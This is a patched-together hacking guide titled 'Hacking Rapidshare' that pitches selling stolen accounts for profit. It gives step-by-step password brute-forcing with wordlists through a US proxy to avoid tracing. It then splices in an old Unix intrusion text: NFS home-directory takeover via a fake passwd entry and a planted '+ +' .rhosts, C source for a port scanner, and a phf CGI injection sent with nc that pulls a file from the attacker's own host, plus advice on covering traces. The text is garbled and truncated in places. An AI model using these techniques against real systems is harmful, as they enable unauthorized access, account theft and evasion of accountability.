Hacking Rapidshare

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                                                             Introduction  Hacking the most criminal activity on Internet is a book about hacking through which you can earn a lot of money it can be 10,000,000$ also by selling RS Accounts.    This book will complete your dream if you are 
                                                   Hacking Rapidshare Login  
For hacking site first come to the site login address than copy the address and paste the address in an application named wwwhack which we will provide you with this book. If you know a username than it’s very well but if you don’t know the username than at the place of username locate the user.txt file and at the place of password locate the password.txt file and start the process.

 If this software replies that it is not a password protected site than you will have to use the wedcracker application.  To begin this hack you will just have to be connected with a U.S.A proxy server. Install the Application web cracker and start the application.

in the place of username file just type the username, in the place of password file browse and select the password list file (password.txt) and in the place of URL type the path to insert the password now choose the options as you wish or leave them blank in the “Advanced” tab give the U.S.A proxy server and in the “logging” tab just select the log file to save the password and at last click at start button. Finally you will get the password.  If the above process doesn’t work for you than follow the bellow process:-  Intro: Hacking step by step.  _

_  Well, this ain't exactely  for beginners, but it'll have to do.  What all hackers has to know is that there are 4 steps in hacking...  Step 1: Getting access to site.  Step 2: Hacking r00t.  Step 3: Covering your traces.  Step 4: Keeping that account.  Ok. In the next pages we'll see exactely what I meant.  Step 1: Getting access.  _______  Well folks, there are several methods to get access to a site.  I'll try to explain the most used ones.  The first thing I do is see if the system has an export list:  mysite:~>/usr/sbin/showmount -e victim.site.com  RPC: Program not registered.  If it gives a message like this one, then it's time to search another way  in.  What I was trying to do was to exploit an old security problem by most  SUN OS's that could allow an remote attacker to add a .rhosts to a users  home directory... (That was possible if the site had mounted their home  directory.  Let's see what happens...     mysite:~>/usr/sbin/showmount -e victim1.site.com  /usr victim2.site.com  /home (everyone)  /cdrom (everyone)  mysite:~>mkdir /tmp/mount  mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/  mysite:~>ls -sal /tmp/mount  total 9  1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./  1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../  1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/  1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/  1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/  1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/  1 -rw------- 1 root root 242 Mar 9 1997 sudoers  1 drwx------ 3 test 100 1024 Oct 8 21:05 test/  1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/  Well, we wanna hack into rapper's home.  mysite:~>id  uid=0 euid=0  mysite:~>whoami  root  mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd  We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history and you might  forget it on the remote server...  mysite:~>su - rapper  Welcome to rapper's user.  mysite:~>ls -lsa /tmp/mount/  total 9  1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./  1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../  1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/  1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/  1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/  1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/  1 -rw------- 1 root root 242 Mar 9 1997 sudoers  1 drwx------ 3 test 100 1024 Oct 8 21:05 test/  1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/  So we own this guy's home directory...  mysite:~>echo "+ +" > rapper/.rhosts  mysite:~>cd /  mysite:~>rlogin victim1.site.com  Welcome to Victim.Site.Com.  SunOs ver....(crap).  victim1:~$  This is the first method...  Another method could be to see if the site has an open 80 port. That would  mean that the site has a web page.  (And that's very bad, 'cuz it usually it's vulnerable).    Below I include the source of a scanner that helped me when NMAP wasn't written.  (Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor).  NMAP is a scanner that does even stealth scanning, so lots of systems won't  record it.  /* -*-C-*- tcpprobe.c */  /* tcpprobe - report on which tcp ports accept connections */  /* IO ERROR, error@axs.net, Sep 15, 1995 */  #include <stdio.h>  #include <sys/socket.h>  #include <netinet/in.h>  #include <errno.h>  #include <netdb.h>  #include <signal.h>  int main(int argc, char **argv)  {  int probeport = 0;  struct hostent *host;  int err, i, net;  struct sockaddr_in sa;  if (argc != 2) {  printf("Usage: %s hostname\n", argv[0]);  exit(1);  }  for (i = 1; i < 1024; i++) {  strncpy((char *)&sa, "", sizeof sa);  sa.sin_family = AF_INET;  if (isdigit(*argv[1]))  sa.sin_addr.s_addr = inet_addr(argv[1]);  else if ((host = gethostbyname(argv[1])) != 0)  strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);  else {  herror(argv[1]);  exit(2);  }  sa.sin_port = htons(i);  net = socket(AF_INET, SOCK_STREAM, 0);  if (net < 0) {  perror("\nsocket");  exit(2);  }  err = connect(net, (struct sockaddr *) &sa, sizeof sa);  if (err < 0) {  printf("%s %-5d %s\r", argv[1], i, strerror(errno));  fflush(stdout);  } else {  printf("%s %-5d accepted. \n", argv[1], i);  if (shutdown(net, 2) < 0) {  perror("\nshutdown");  exit(2);    }  }  close(net);  }  printf(" \r");  fflush(stdout);  return (0);  }  Well, now be very carefull with the below exploits, because they usually get  logged.  Besides, if you really wanna get a source file from /cgi-bin/ use this  sintax : lynx http://www.victim1.com//cgi-bin/finger  If you don't wanna do that, then do a :  mysite:~>echo "+ +" > /tmp/rhosts  mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+  /root/.rhosts" | nc -v - 20 victim1.site.com 80  then  mysite:~>rlogin -l root victim1.site.com  Welcome to Victim1.Site.Com.  victim1:~#  Or, maybe, just try to find out usernames and passwords...  The usual users are "test", "guest", and maybe the owner of the site...  I usually don't do such things, but you can...  Or if the site is really old, use that (quote site exec) old bug for  wu.ftpd.  There are a lot of other exploits, like the remote exploits (innd, imap2,  pop3, etc...) that you can find at roo   Remember: you should use a U.S.A proxy server. The benefit of connecting through a proxy server is that the site couldn’t know anything about you, he can’t trace you.  _________________________________________________________________________ ______  _


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